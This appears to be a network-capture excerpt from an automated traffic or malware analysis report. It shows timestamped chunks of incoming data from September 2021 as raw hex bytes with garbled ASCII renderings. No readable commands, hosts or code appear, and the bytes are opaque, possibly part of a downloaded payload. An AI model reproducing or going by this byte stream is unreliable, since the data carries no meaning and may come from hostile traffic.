                                        2021-09-22 18:59:43 UTC128INData Raw: 40 29 ee 00 56 45 7b 33 cc 08 98 2d 72 e6 40 52 f1 ee 15 d7 ff 00 82 51 17 8a 03 e3 c1 b7 3c 22 b3 9c e3 47 22 91 64 52 32 e2 97 62 27 6b 51 4b c0 4a 20 98 7e 29 78 1b 8e 2e 69 3d db 01 c6 d4 b4 41 23 ce 9b 39 be 59 63 06 f5 4b 80 2e 2e 9b 4b 6f 57 7a 58 bb 53 97 65 50 93 99 c9 72 62 88 87 85 ca 76 7a 9b e7 21 fc d2 b8 88 c5 d1 17 6d 49 45 4b b5 00 a0 b8 9e 99 2a 37 b5 71 12 e6 66 21 3a ea 7d 48 e9 7c 28 0f d5 31 c3 7c 52 61 a7 2c cd 3e cb 15 f6 8b 43 92 eb 52 56 44 93 40 ca 5e ac 03 9e b2 6c bb 0e 5e 04 89 0d 9f b6 cb 9a dd 99 ac ea 30 8e b5 71 47 55 c3 bc 5e 78 e9 35 c1 dd ed 07 82 5c 51 4c 38 aa 2e ed 4d fa 69 25 43 44 f5 da 85 45 7a 69 79 55 a9 2d 2e 6b 1b 9a 31 fc fc 4d fb c4 e8 06 7e 75 b9 c5 e2 f4 e4 14 bc 59 e0 48 a6 cb 3a 4b 2e d8 05 e8 8d a6 f8
                                        Data Ascii: @)VE{3-r@RQ<"G"dR2b'kQKJ ~)x.i=A#9YcK..KoWzXSePrbvz!mIEK*7qf!:}H|(1|Ra,>CRVD@^l^0qGU^x5\QL8.Mi%CDEziyU-.k1M~uYH:K.
                                        2021-09-22 18:59:43 UTC144INData Raw: 72 eb 6d ae f6 22 41 ad 0c 03 0d 43 ea 45 f2 33 ea 84 8d 6e d6 c0 eb 41 a6 4a 44 3f 30 69 fc 7b 74 33 f9 cf b0 07 2d 45 8a 46 45 ee 39 84 35 ff ac 72 10 8c bb 1a 54 76 ef 73 b9 87 7a e3 bd ef 7f 00 4c 11 ae dd 39 5a e8 f7 72 b5 4e b7 28 6e b2 2e dd 64 b3 b6 57 5e b6 f0 77 7c 07 28 7d df 9c 81 00 03 04 6a fc 90 a6 a9 53 6a 9c a4 d4 98 9a 87 c6 75 02 65 a4 53 a0 19 3e d3 80 51 89 3b 7b c7 1f 17 a8 90 d0 38 3f 23 64 91 8d 80 37 e3 46 e6 f9 33 60 c4 ed f9 3d 0d c0 94 ce ad 20 5a 22 63 b9 29 96 5e 84 38 fd b8 3c 17 d5 69 cd 01 21 d1 c0 f0 3d 87 98 1f 81 56 62 13 7a 7a 45 5e a5 20 49 7c d5 ab bd 1a 4a d6 45 62 fb e0 7f 36 49 f2 3a 11 1b a3 18 af 28 a4 5f 81 db 75 c4 10 20 c3 b8 e4 c3 1a ca 3c 0c 69 2c d1 0c 3f a7 0f 95 a5 75 13 97 2c c7 c1 96 ee cb c1 f0 f4 f5
                                        Data Ascii: rm"ACE3nAJD?0i{t3-EFE95rTvszL9ZrN(n.dW^w|(}jSjueS>Q;{8?#d7F3`= Z"c)^8<i!=VbzzE^ I|JEb6I:(_u <i,?u,
                                        2021-09-22 18:59:43 UTC160INData Raw: ca a7 46 b7 b7 d1 1d c0 ba 50 63 16 2d ce d6 0d e5 89 21 02 3e 6d 6c ba 08 dc c1 15 2e a2 8d 3d 56 3f e6 b1 ab eb 05 99 c9 6f 1c 46 07 40 61 5a 32 a9 97 22 05 95 bf 10 13 47 b0 11 7a 96 b2 a4 9e ff 72 4b 8d de a9 48 e2 79 a4 01 0b 17 93 ab 76 35 ca 7b 17 a3 ab 5d 50 09 46 55 f5 d7 ce 60 68 0c 56 d8 ee 6c 05 d4 f2 43 ca c7 d2 6f c9 ae 3d d5 3d a1 e3 0f e5 8a c4 aa 5e f8 f4 df 5f cb b3 b5 d7 a8 ce 25 99 21 a8 4c a2 f5 92 8b cf 73 5d 3a cf aa 17 b2 c4 8e 6a a1 37 48 7c 5a d6 78 a6 b9 ac 61 25 23 0a f3 8e 76 37 c1 ea a8 68 18 b3 4f 36 44 ae b9 85 b9 4f 39 52 9f f2 b8 b3 ec 9a 36 08 9f 57 45 03 99 a8 62 5f a7 37 58 97 2e 33 9f 61 ae 08 e9 71 1a 52 66 07 28 a9 1f fe 10 53 67 b2 fb d6 a1 59 a7 43 e4 9b 66 5f ff 38 18 d1 ff da 4b 4d 83 53 1d 5c 0f 72 67 8d f1 1f
                                        Data Ascii: FPc-!>ml.=V?oF@aZ2"GzrKHyv5{]PFU`hVlCo==^_%!Ls]:j7H|Zxa%#v7hO6DO9R6WEb_7X.3aqRf(SgYCf_8KMS\rg
                                        2021-09-22 18:59:43 UTC176INData Raw: b9 5f 90 86 1b 3d 6e 25 32 23 5f 92 e8 57 59 87 e0 f1 c3 0f b6 2d 84 f3 c3 b6 06 da aa 8f e1 10 77 a3 0a a0 92 5e 01 48 7d 05 11 8f 5f 04 b4 77 3c cf 40 7f 79 64 4f 52 e9 ba 49 1d 10 7d 3c 26 4f 28 2c 88 3a 42 44 9c 19 ac ee a7 65 d0 d0 14 1b 44 78 fd a4 52 3a c7 a8 36 fb fe 64 92 e1 89 f3 9c a6 fd ac d8 a5 cd 2f 64 e4 63 1e cc 92 96 04 79 61 07 ac 66 1c cf c8 6d 5a b7 39 1a d7 fd 0d be 36 44 50 68 9b 3a 4e 26 ab d3 74 49 88 a6 30 5d 07 76 54 e7 19 5c 6e ba 6b f3 c5 88 1a 11 a7 91 f4 be ea 9d e3 4c bf ec fc 1f ca d1 55 10 e3 d0 99 d0 04 a6 36 45 4b d3 2e 1b ad a9 8d 88 0a eb 41 8c 54 c8 d9 72 82 52 43 34 b0 9b 54 dc 7a de 32 27 da 0f 07 b6 1b 02 3e 13 f0 11 df a0 47 c1 6a c2 6b 76 d9 99 8e 75 b3 49 95 62 66 71 67 4c 90 e1 e8 88 91 b0 95 68 48 b9 2c 52 84
                                        Data Ascii: _=n%2#_WY-w^H}_w<@ydORI}<&O(,:BDeDxR:6d/dcyafmZ96DPh:N&tI0]vT\nkLU6EK.ATrRC4Tz2'>GjkvuIbfqgLhH,R
                                        2021-09-22 18:59:43 UTC192INData Raw: a2 02 87 13 c2 59 c0 57 c9 02 d6 a9 6a a1 24 ad ad 9d 56 d3 c3 30 82 3c a3 ef 5f 2d 43 bb dd 3e 07 c0 d8 d3 52 af a6 90 c8 26 40 81 f7 71 9f a2 2e 17 63 da 8a b8 ec 9c 54 13 6d e2 eb d3 5d 8b b0 ce 0d c8 31 3c ec 52 bf bd bb 6f 46 d3 59 1d e8 61 25 12 f5 f5 44 7c ff db 9e 23 b9 c3 a5 85 9d 7a 32 3c 1c 62 56 e2 21 6e 20 d3 8c d0 28 3c 0e 0a 2b a0 d5 96 d1 29 cd e8 c0 ad e8 a6 2f 9b c4 89 4a bc ea c4 64 07 88 9c fd 34 49 2b b1 71 91 e0 5e 31 62 4f 55 98 9e 20 51 99 9e 43 04 db b2 65 b1 b3 a4 03 83 5c 39 fe cc 5b fa a9 22 b8 48 9c c9 cc 04 db 26 75 94 0c c6 42 28 a9 db 3a d9 aa 54 cd ce 4c 3c 27 f5 2c 30 bb aa 74 bb 34 c2 d6 55 d7 75 f0 89 13 7f ff 7d 03 2a bd dd 69 ab 4e b8 78 fc 1e 8e 1a 65 af a6 95 0b fe 6e 50 b9 13 62 f0 c5 40 89 af 5f 26 d6 2c f7 65 89
                                        Data Ascii: YWj$V0<_-C>R&@q.cTm]1<RoFYa%D|#z2<bV!n (<+)/Jd4I+q^1bOU QCe\9["H&uB(:TL<',0t4Uu}*iNxenPb@_&,e
                                        2021-09-22 18:59:43 UTC208INData Raw: c6 a1 3b 2b eb c8 a1 d0 b0 3c 96 10 02 8d f1 5a c9 a7 27 b5 16 b5 44 60 10 ef 42 58 12 11 bb 32 db 12 f3 b0 0d 27 b7 24 56 12 86 a2 7a 48 c1 4d ef b4 02 70 f7 a1 dd 6d f4 dd 9e ea fd 56 29 19 d1 2b 5c 91 bf 05 5d e1 b9 c7 79 8b 44 91 26 af fd 49 3d a2 41 70 aa b0 b1 ed 1b 82 e5 2e cc 68 17 f0 87 70 c0 ba 7e 8e 71 5b 28 d0 bd a2 bb 62 64 8b 19 8a b7 47 44 78 e1 d7 0a 82 a4 ff d9 98 ee 8f ce fd 2c 0e 01 5c c0 89 b6 9c 96 8c 84 8a 98 0e df de a6 f6 e9 33 74 bd 99 0c 84 05 7d d8 34 fe 53 89 04 c8 c0 e0 4d 51 54 be 4a 1b 3e ce 17 c5 80 02 3c c8 77 a8 4b b8 fc 7a a4 3a 8e c9 5c 03 86 c9 90 aa d1 52 7d 6f 3d 4e 8f f0 24 fd 9c c1 f1 d0 12 99 67 f9 25 ac 2b 8f 7e b8 f8 5e a3 ec a3 ce c4 57 a5 ce 15 36 ba 77 96 a5 77 2d 91 5c 0e 30 d7 74 f8 54 d4 7d 0f 17 f6 35 f5
                                        Data Ascii: ;+<Z'D`BX2'$VzHMpmV)+\]yD&I=Ap.hp~q[(bdGDx,\3t}4SMQTJ><wKz:\R}o=N$g%+~^W6ww-\0tT}5
                                        2021-09-22 18:59:43 UTC224INData Raw: 10 43 7c 7d 06 16 27 c5 14 95 e6 ca 3c f4 fa 63 91 02 e1 fc 28 1c 5b 5e 3b 8e 95 2d ac 46 49 b3 6e bc 6e 55 1f fc c8 3b e2 d0 7d 9d b6 3d ff ce 46 5e 7a a8 4b 91 ab 6e f7 4d df 64 2f 9d 91 5f 8f 3a a4 8d 57 a9 10 67 d6 85 b8 6f fd a8 31 ac ad ee 4f 04 56 71 4d de ba 8d dc 21 e8 dc 93 2b 9b 77 f3 24 a5 e2 04 72 23 47 53 97 92 29 f1 c0 0b e9 3c f2 f9 7b 06 68 39 e8 aa 24 1c b1 0c e2 63 6a c6 32 da f1 ff d5 ee 2f af 4d 88 90 50 aa 11 be 56 cf 9f 7d b7 c2 bd f3 12 76 56 78 96 bc b3 30 99 5f 44 61 1c 20 35 c9 ba 7b c2 ee f9 6d 9e 74 5d 38 12 e8 a8 7e 2b 72 c7 96 9a 9c 67 a1 51 fb 2e 1c 10 ab e0 5a 47 64 5a 7c af d9 cb e0 89 b6 1b 89 de 42 d9 21 12 fe 8d 3d af 8f 64 ab 5a 7c 20 fa cc 0e e0 b7 dc e9 22 c0 20 c1 80 bf 7f 25 c0 69 94 38 5a 60 98 da 97 d3 6d 0a 5c
                                        Data Ascii: C|}'<c([^;-FInnU;}=F^zKnMd/_:Wgo1OVqM!+w$r#GS)<{h9$cj2/MPV}vVx0_Da 5{mt]8~+rgQ.ZGdZ|B!=dZ| " %i8Z`m\
                                        2021-09-22 18:59:43 UTC240INData Raw: 9b 93 18 d3 e8 14 e3 f6 80 a9 a0 99 9d cf 6e 04 50 bd 6a 90 43 cc d4 5a 70 e9 93 10 11 3a 98 73 65 cd db 63 89 c8 89 b8 3a 82 d8 f5 44 4f 20 69 b6 a2 9d 01 5e e1 d5 b8 40 d7 9b ea fc 1f 11 71 7c 34 50 6f e2 35 78 89 c7 49 a8 0b b5 03 fe 9a 79 63 b7 a7 69 7b c7 a8 36 a2 42 74 3f 55 c4 8f 4f ff 5c 08 bb 52 ca 69 24 9e 85 fd 7b 68 d0 f1 12 3d 03 e2 e7 60 9c 35 fb 5c f2 ad 44 84 93 6f 11 67 32 f2 1c 2c 90 ae f3 53 d2 61 be 68 f5 7e bc 52 b3 71 bc 91 06 e0 24 e0 47 81 a8 58 b6 99 83 9b f1 25 14 7b 07 d5 fb a3 00 92 6d 59 06 d0 27 cb b8 21 fd de 49 d6 f0 80 fb c5 d1 a2 a3 17 85 2d 0d fc 87 d6 f9 68 e2 e1 1b 72 fc d6 8e 41 77 d1 1b 58 e0 53 60 6a ce 13 aa a6 ce a0 3f c1 5c fe b3 2d 3c d2 5d d5 74 59 28 28 25 41 f1 46 2c 62 d9 05 75 21 26 11 39 08 ca c0 20 0d 3c
                                        Data Ascii: nPjCZp:sec:DO i^@q|4Po5xIyci{6Bt?UO\Ri${h=`5\Dog2,Sah~Rq$GX%{mY'!I-hrAwXS`j?\-<]tY((%AF,bu!&9 <
                                        2021-09-22 18:59:43 UTC256INData Raw: 3d df 4b d0 38 88 bf 0d e5 37 06 07 3c 53 e9 a2 45 5e 23 aa 58 7b e1 ab f2 ab 69 00 1a 40 86 12 47 7d d1 b9 4b 47 aa ce e9 fd 0d 39 28 e6 89 98 ed bd 82 33 d7 15 34 a3 44 fa 29 97 d5 6d fa da 33 ac 6e 79 08 46 16 ad 59 85 ac c2 c0 03 16 04 2b b3 47 bc bc 90 e8 af 80 4b 35 78 74 35 73 65 fc 3f 85 22 46 72 48 e5 75 3e 5c ee d8 49 3c 48 c8 3c 67 d9 10 65 86 dd c5 60 59 c4 c0 b5 a3 d6 9c 2a 0a 2b fe 3c 7a 78 64 2e 94 50 54 15 3a 18 82 80 80 27 0d 87 26 24 3c 4f 28 d7 25 63 bd 49 e3 0b fb 2e c8 97 0d 3e 19 3b f7 fd 5f 1e 32 57 a1 03 60 9d 2e 7f 16 8d fe e1 53 ea a1 36 93 ec 2f e6 d3 ec f2 c3 db e8 82 f8 cd b6 0d a4 ac 93 72 f6 74 75 5d 17 06 cd 32 cb 7c b4 e5 e5 d8 9e 79 c5 80 8d 0a e6 f4 8a 0f a7 79 61 57 6b 99 3a 23 66 cd 41 a1 58 6e e0 77 a2 16 e4 7b 7b 18
                                        Data Ascii: =K87<SE^#X{i@G}KG9(34D)m3nyFY+GK5xt5se?"FrHu>\I<H<ge`Y*+<zxd.PT:'&$<O(%cI.>;_2W`.S6/rtu]2|yyaWk:#fAXnw{{
                                        2021-09-22 18:59:43 UTC272INData Raw: 48 ce a4 3f dc 51 93 33 3b 88 c5 f3 f5 9a 87 8b 05 d8 be 0a 69 52 45 6a ad 9c 10 fa be df 56 a6 3e a8 41 b0 e7 89 65 a9 72 11 b2 86 5f 04 16 10 5c e4 23 45 68 05 f6 56 47 35 a9 23 c7 1a 00 83 95 41 d5 e2 94 22 aa 09 3d f5 80 4f 70 b7 6b 5a 6d 28 e6 52 b5 6e e3 f4 80 92 4b 38 7e f9 1e 4c de 19 d5 8f 44 b0 fc 84 e5 35 27 a5 23 5b b1 ba 5e e6 ef 82 a9 74 56 41 10 94 10 ed bb 0a 64 1a 2d 3d 51 55 b6 77 65 0f 92 aa 37 81 9d a6 36 a9 0c bf b2 3a e9 76 6f c2 58 72 a6 ea 0a bb 57 43 b6 05 a1 85 a4 9b 0f 1d d8 c6 03 88 a4 2a d1 42 f8 8f b0 09 fa 1c 56 78 c6 c4 c4 c8 41 e4 dc 2c e3 1f 7e 1f 49 24 2b 65 49 23 43 42 e6 5b 01 0e b4 5a 13 ed c8 82 26 b0 87 99 a5 1b ae 5e c5 9d c7 19 bb 93 cc b8 34 8b 4c 61 96 4c cc 22 6e bc 46 4c e8 d2 12 23 cc e0 b9 0c 25 bb 2c 61 95
                                        Data Ascii: H?Q3;iREjV>Aer_\#EhVG5#A"=OpkZm(RnK8~LD5'#[^tVAd-=QUwe76:voXrWC*BVxA,~I$+eI#CB[Z&^4LaL"nFL#%,a
                                        2021-09-22 18:59:43 UTC288INData Raw: aa 7a b8 f0 d0 9b 03 25 a9 18 6c 01 30 d1 b2 85 1a 7d d7 91 ac 78 9b 7e 62 78 31 2c cc 1a bd 47 fb 9a 76 8e cb 02 3e 6c 6c 57 d6 2e 04 b9 e0 b6 e1 b6 5d a1 ec 9c cf 52 33 71 b0 40 86 fa dc d2 e4 c9 96 f3 85 76 24 d2 47 37 c2 88 3c 02 43 0e d4 52 60 07 2e 8b de 76 c9 40 8f 97 96 2d 22 99 34 ed d6 9a db cb 18 3f ea 80 e6 31 ad 6e 2e ce a2 40 96 e7 cb bf 76 96 bf f2 24 1f bb 79 06 d2 64 55 2e bd 0a 3b 21 de 5e d9 ab 4c 5b 31 bb 41 30 00 21 9f a5 53 77 d5 b4 d8 6a 9f b7 23 de 34 52 46 f6 f0 5e 40 3a a9 56 ab d1 9b 84 0b 27 c1 cf bc b6 47 6d 87 d2 c2 a6 a5 f5 38 aa 68 99 47 ab ed 6b c4 b8 28 79 b6 80 e0 2c ce 23 6a 40 72 e8 2e 81 a6 05 f4 94 23 ff c0 45 ea 95 ce e6 dd b0 64 9c 8e 06 5c 30 1f dd ba 48 f7 75 e5 50 42 11 83 dd 8d d4 60 e4 8b b3 30 14 cc 94 39 7e
                                        Data Ascii: z%l0}x~bx1,Gv>llW.]R3q@v$G7<CR`.v@-"4?1n.@v$ydU.;!^L[1A0!Swj#4RF^@:V'Gm8hGk(y,#j@r.#Ed\0HuPB`09~
                                        2021-09-22 18:59:43 UTC304INData Raw: 0e 7c 87 25 55 b7 fc ba 0e f2 72 4b 13 08 12 e8 e7 dd af c9 80 db 72 60 8c fd 35 e1 ed 04 ba b2 9c 08 85 e8 94 9c 80 ec 6d d6 91 37 30 2d b6 7c fc 9a 09 8e 13 a0 3c 8e 91 87 a4 c6 95 dd f6 2f 4c 21 bc 6b 03 19 8e c6 d7 5d e7 2e 31 95 8d dc a6 6f a9 61 5c a8 5c 29 a9 3b ff eb af c7 7f 43 ef d5 06 65 42 dd 8b e9 1b 7b 90 ee d6 1e a8 65 4f 7c 60 b9 fa 65 23 6a b3 ea d3 a9 be 0f 5c d0 88 e9 fc d0 42 f9 34 50 a4 99 bc af f4 f4 ee 5a c0 6c 89 49 be 83 0d 1e e4 f4 51 29 88 45 e5 0e e1 73 e7 28 8d 84 97 c1 84 d4 e2 8d 12 33 42 9b 3a bb 52 88 9a 18 8d 80 9c fe 1b 4f 9a 5b 7c 9b 65 4e 8f 22 03 c2 92 6a 95 ac 5c fb bd d8 e5 bb 23 a7 b5 70 79 14 06 b4 3b b4 c7 aa ba 67 ec 9a ac 38 27 e6 cc 9b e9 84 9a 7d fa 00 67 96 d3 c0 e5 c1 47 6f e9 2c c4 c7 c9 9e e6 3d 5d cd 46
                                        Data Ascii: |%UrKr`5m70-|</L!k].1oa\\);CeB{eO|`e#j\B4PZlIQ)Es(3B:RO[|eN"j\#py;g8'}gGo,=]F
                                        2021-09-22 18:59:43 UTC320INData Raw: 4b 7c 14 32 85 9c 1a 8e 96 a4 0a c8 d3 55 5f bf 79 5b f0 d9 f3 4c bd 28 b3 87 c6 b3 08 b8 4b 0c 88 92 55 db 34 1e 02 ee 4f 44 59 fe 5d 09 cc 1f a7 18 75 16 ce 5e 77 97 55 8a 7b 76 de ff 0a 62 7c 18 ad 07 83 3c ae 6c a1 92 c7 66 63 6c 6a 6f 23 a2 2d 1d d0 31 d7 53 df 87 6c ff 1e 93 3a f5 d3 fe e2 b2 6e 1c f3 e4 09 f0 9b ff ac ef 2e b5 1f 25 2c 00 d3 a5 39 80 6b b4 81 b9 71 b6 b2 ca c2 44 58 3c 6b a2 b2 99 5f 99 b7 15 6b bd bf d4 29 d2 40 09 58 09 9f c2 1f 9a 1e d2 95 91 b4 5c fa 23 12 0e cf 30 81 15 06 0d 4f 51 73 c9 88 d5 af 7b 7d 71 c0 9d 66 fa 7b 9b 79 f2 27 2c 37 2e 36 7e 3c 75 2c 2d bf 4d 6e 5a b1 b8 6d 2b 37 8e cb ff cc ff 5e ab 61 ca c0 71 9b 0f fe bf 8c 66 98 11 43 08 66 a7 23 fc d9 51 55 c4 d4 e7 b6 c8 b1 8d 95 0f 04 28 ff 80 b6 3e 2c ee 59 32 e7
                                        Data Ascii: K|2U_y[L(KU4ODY]u^wU{vb|<lfcljo#-1Sl:n.%,9kqDX<k_k)@X\#0OQs{}qf{y',7.6~<u,-MnZm+7^aqfCf#QU(>,Y2
                                        2021-09-22 18:59:43 UTC336INData Raw: 78 e2 39 04 d8 35 c8 cf 79 0d f8 a4 e6 a0 41 2f c0 ba 54 9a a1 45 a9 9c 73 22 08 71 39 c9 a3 d3 ae 25 a9 27 29 4f c4 8a 8e 6a 1c 51 33 97 d6 be 70 68 29 94 ed 7c c6 71 b5 50 09 36 8c 12 64 19 a5 10 5c 63 4c c8 fd 2f 4f 1b 32 1b 7e 3b 7b b9 32 2d fb 4c 16 6e 5d 26 a6 b7 b1 22 0c ed 12 d8 3e 3d 1c fa 50 82 2f 4f 85 a6 89 72 86 24 a0 85 b4 37 f1 50 69 fb 8b 8e a9 38 28 13 d0 1a 9e 3d 03 4a 43 46 d8 78 a6 76 a9 80 71 4c 32 eb 5d 28 6e aa 98 b0 b4 1c 75 c0 2b 42 d8 91 45 f4 5f ca 84 c5 72 af 91 20 6d ec 9b 40 76 96 25 00 14 5b ea c3 9a 50 22 fc 86 44 39 aa 2d 7d 17 df ec 05 a3 00 5f ab c7 5c 8a 81 2f fc be 90 d3 22 0a 32 9b 62 df 34 e0 a8 f8 f7 c2 10 45 14 22 a9 2d b6 6f aa b6 ee e1 b4 42 95 4f 78 76 90 7d bd 3f d8 f8 9e a7 d0 c8 e9 1f 94 6f 91 2b 12 88 a0 14
                                        Data Ascii: x95yA/TEs"q9%')OjQ3ph)|qP6d\cL/O2~;{2-Ln]&">=P/Or$7Pi8(=JCFxvqL2](nu+BE_r m@v%[P"D9-}_\/"2b4E"-oBOxv}?o+
                                        2021-09-22 18:59:43 UTC352INData Raw: 4a e1 7d 2c 8e 60 77 e7 00 32 5d 25 54 d2 b1 b7 66 56 fb 92 b0 d3 c4 05 20 82 3b 15 17 a4 30 78 8d dd ae 29 ad 57 32 ae 03 e7 93 11 1a e0 6a f6 88 71 db 0b 8e a8 3f 08 60 11 31 f3 1b 3b f4 28 f4 4d 58 99 88 0a fd 30 44 23 8c f4 5d 12 42 8b 20 5f 69 b7 d0 f2 08 22 0d 26 c8 8f 6c 25 bd 3c 67 69 10 cc e0 6e f3 5c 68 ef cf e4 e1 70 19 d9 07 50 f0 21 fe f6 fb 95 12 14 06 a9 7a 11 ab 5b d6 b0 77 d9 2e cf 7d 34 f1 a0 85 39 d9 39 31 7c 6a d4 43 d1 76 56 fb f0 1c 58 0e f0 6b 07 52 d4 cc bf 67 e2 43 2f ea 7c bd 61 72 87 27 40 ab cd 82 be b5 22 a9 82 4c d7 73 0e c8 b9 ed 67 67 64 c9 54 86 cb c3 6f 88 09 e2 f2 8a 17 46 e0 2f bc 71 44 25 e1 76 c2 83 29 77 00 6c 4a 1a fd 55 4b 51 49 1e 8f b5 a5 e8 24 95 36 70 9d dc 56 ae b5 68 7b d9 3b eb d0 03 53 b1 bb 11 ef ad 3e 39
                                        Data Ascii: J},`w2]%TfV ;0x)W2jq?`1;(MX0D#]B _i"&l%<gin\hpP!z[w.}4991|jCvVXkRgC/|ar'@"LsggdToF/qD%v)wlJUKQI$6pVh{;S>9
                                        2021-09-22 18:59:43 UTC368INData Raw: d8 4a 2b 4c dc 9b c6 b4 66 d7 60 2b 4f 25 c6 3f 57 c5 c9 1b e8 34 0b b0 6a 22 1f 36 14 b2 98 2f 62 41 70 1d 0c 68 c3 68 8d b4 27 27 11 ad 6c b4 ae f8 74 64 46 90 cc 63 c9 24 87 e1 e8 fb 99 6f eb f0 4b 1c 9f ae 2a 54 93 f1 2a 10 da 6a d0 08 06 2d a3 92 58 c8 9d 36 17 71 ab f3 52 23 59 ce b6 c7 a3 1d fc 20 57 18 fe 19 2e 1b 97 e3 0b 3b 5f 71 11 a5 22 89 c7 cd 74 ac 4d f4 fd bd 76 5c a8 92 fc 93 d8 39 08 aa 7e c4 32 8e 3e 33 6c e2 01 6f 4f b2 60 05 b4 73 56 8f d9 a6 c6 d6 81 44 78 b8 7c 61 f4 9e 4a 4d d8 8d ca 95 21 49 a4 c3 ba fb 1d d2 42 8a 2c 0a 8e 51 3e bc 1a d2 b0 e4 c0 0f 49 9e 54 5e 18 80 f5 b7 30 8a c5 f4 c6 aa 3c cb aa 55 33 a4 a9 08 18 dc c8 94 61 4c a6 1a be f0 2b 62 1a 5c 9f 9d e3 2c cb 3a 3a 99 8d 8d f8 60 60 85 cc 5a e6 6b 19 28 f3 45 9e c3 ee
                                        Data Ascii: J+Lf`+O%?W4j"6/bAphh''ltdFc$oK*T*j-X6qR#Y W.;_q"tMv\9~2>3loO`sVDx|aJM!IB,Q>IT^0<U3aL+b\,::``Zk(E
                                        2021-09-22 18:59:43 UTC384INData Raw: 46 4a 6a 89 6f 7e 49 a0 28 7f 4d b2 5b ca 56 53 d1 d0 7c af 02 d9 5e 76 bb cd bc a1 91 e2 93 71 5b 6e e4 55 99 5d 4c 9e 70 00 d2 16 36 a0 21 ab a9 e2 9e bc 1b a2 99 6a 05 59 f1 52 ea 50 2d 89 f9 cd aa 94 ed e0 81 ff 48 5b b1 54 32 8d cb aa 0a ff 2d ce 98 d9 29 4b 85 8a 5a 26 82 ad 3b 69 43 1b ca b3 c6 f7 1b f9 c8 da bb cc 7c 39 67 bc 1f 5c 6d 3f f5 a8 66 68 bf 27 e7 b9 ec 7a c7 d7 d8 a7 0a 92 3f fa cc 42 cc 29 29 f0 6a f4 ef af ef f9 ce a2 fb eb 96 96 b0 5d a7 14 78 99 dd 33 02 93 d5 8e b8 46 90 a0 93 75 63 1c 05 40 72 5e 5e c3 72 c0 c3 c7 40 53 0f 2d 47 aa bf 7d a4 0b ce 14 66 c1 21 06 5d 89 00 84 b8 7f 51 8f cb df 06 7e 14 c6 31 c2 fe 60 35 4f 62 3f 72 4b 90 be 57 1b ee 7f a4 9f 64 47 60 33 0d 4a 5c 51 9d 23 6f e1 e6 fc 61 98 0f f0 0a 31 a1 99 a5 19 42
                                        Data Ascii: FJjo~I(M[VS|^vq[nU]Lp6!jYRP-H[T2-)KZ&;iC|9g\m?fh'z?B))j]x3Fuc@r^^r@S-G}f!]Q~1`5Ob?rKWdG`3J\Q#oa1B
                                        2021-09-22 18:59:44 UTC400INData Raw: 13 24 84 4c 5d e3 0d a3 fa 2e 44 84 6c 22 ce 53 9a 06 4f 94 d9 b6 c6 71 ad 8d 46 63 8a ca ec 90 e4 87 ab 71 fb 26 92 2e 7c e7 51 e9 54 db 5d 10 f3 2a 55 93 db 92 11 34 04 8b c8 4d 4c 30 2c eb 6d 8c 90 7c e5 c8 fd 78 ac 9b 65 63 df fe 31 f5 aa ec 2d 49 38 12 7b 6f 83 c9 32 b2 f9 35 75 d9 ab 11 da f6 f6 17 9a dd 51 d8 ee f2 f6 9b 5d 7d 80 d3 2d 1c b4 8a c5 66 e9 39 6f 9b 11 77 1d 6a ce 49 1a 0c 95 78 ab 4d 28 05 35 96 ac db f3 ed c6 d1 c0 a8 e7 05 46 b0 ab 2d a8 f3 e3 e9 10 68 a0 13 ac 3a b4 a8 d4 5a 82 33 ab b7 47 a0 bc e7 3d 4e 20 3f 80 89 53 f2 be 52 5e b5 ee 58 8e bf 90 e8 3c 28 f3 5e 5a b5 42 96 89 65 63 f8 3e f6 a5 4c 3c 70 bf 7c 69 37 d1 4a 41 87 22 6d c0 4a 1e 9a 7c 99 7d 08 fe 10 00 56 86 03 39 11 5d 37 33 c9 e6 bd 67 9f 60 d7 05 b0 10 ee 74 c7 dd
                                        Data Ascii: $L].Dl"SOqFcq&.|QT]*U4ML0,m|xec1-I8{o25uQ]}-f9owjIxM(5F-h:Z3G=N ?SR^X<(^ZBec>L<p|i7JA"mJ|}V9]73g`t
                                        2021-09-22 18:59:44 UTC416INData Raw: 15 4a 4c 21 0b a5 86 88 fe a7 60 74 dc 98 5b b4 ba ac 44 9a 97 ff 77 67 78 ee 64 64 c7 b5 50 18 70 b8 68 31 b9 c3 e6 6b f9 aa 47 1e fb 6e e8 5c 73 6e 15 16 25 1b 8b 55 8f 8b 60 02 ef 69 86 05 3d 26 32 c1 ea fe 32 f7 69 0d 40 15 b4 ae bc d8 90 06 20 bb 8a 83 f1 dc 5d 58 be e2 ea ab 85 50 a0 db 8c 83 90 59 78 1a 36 ec fe f4 c0 99 66 a8 fd 26 ce e2 da 02 10 95 2c 26 22 44 6d 76 21 e6 64 51 ee 3d 79 48 1c ce d0 d1 48 b1 f8 9e e1 49 e5 3b 79 ae ba 35 76 88 ca 72 89 6c 6f 3b 98 ac 55 4c d8 12 25 b3 74 88 46 b8 f9 71 ed 00 82 9c 41 8b 62 d2 91 6d 84 47 e7 0a 29 fc f8 a5 5a aa ac d9 76 c5 ba 3f dc 38 fe a2 f5 b9 b1 5b 8e 1e da 08 6f dc 32 3f b8 e5 49 7d 12 d5 dd 63 90 7f bc 70 ed 58 5d 9c a9 4b da be c1 73 50 71 c0 be 5c 9c 88 86 05 0f f2 24 dc ad ec 7d fe 4d 36
                                        Data Ascii: JL!`t[DwgxddPph1kGn\sn%U`i=&22i@ ]XPYx6f&,&"Dmv!dQ=yHHI;y5vrlo;UL%tFqAbmG)Zv?8[o2?I}cpX]KsPq\$}M6
                                        2021-09-22 18:59:44 UTC432INData Raw: 9b 91 62 34 8d 5f 48 32 31 8f c8 ed 5e b9 3e d2 21 76 7e 80 11 09 7e 15 bf 3f 60 91 a9 70 f1 78 de b2 8b 95 b6 da 42 fd 7e 55 1a 0c 18 47 24 46 58 a3 81 4c 70 7c 5b 70 3a 44 88 78 84 c6 e5 c9 a8 28 57 9b 54 9e 01 00 16 3a 1c 3f 6f 87 2f 3c 5a 4f 62 57 b3 2b a8 c0 c0 9c 09 58 ba 74 2e dc 35 87 cf 7a 07 ad b0 22 bd 84 3d 44 6a 43 5e 36 b1 53 7e 60 01 44 12 c5 3b 42 ca b0 ab 7b 50 20 07 5e 39 f6 50 e1 fd d2 56 21 e9 ad c2 65 28 55 c4 56 c2 c0 be 2d 7a 7f aa 55 93 fd 1a 81 b7 57 76 c0 75 45 5d 0a f1 c0 b1 40 da ff 6f 10 56 83 81 46 5a 7a 61 c5 af 15 4f a2 80 b2 d0 c4 57 aa 38 ad ba 1b d8 ef 09 11 d1 5a f7 e6 90 95 93 51 31 4b bd ad e0 a8 d1 26 cb 82 31 b3 a4 68 dc cc 52 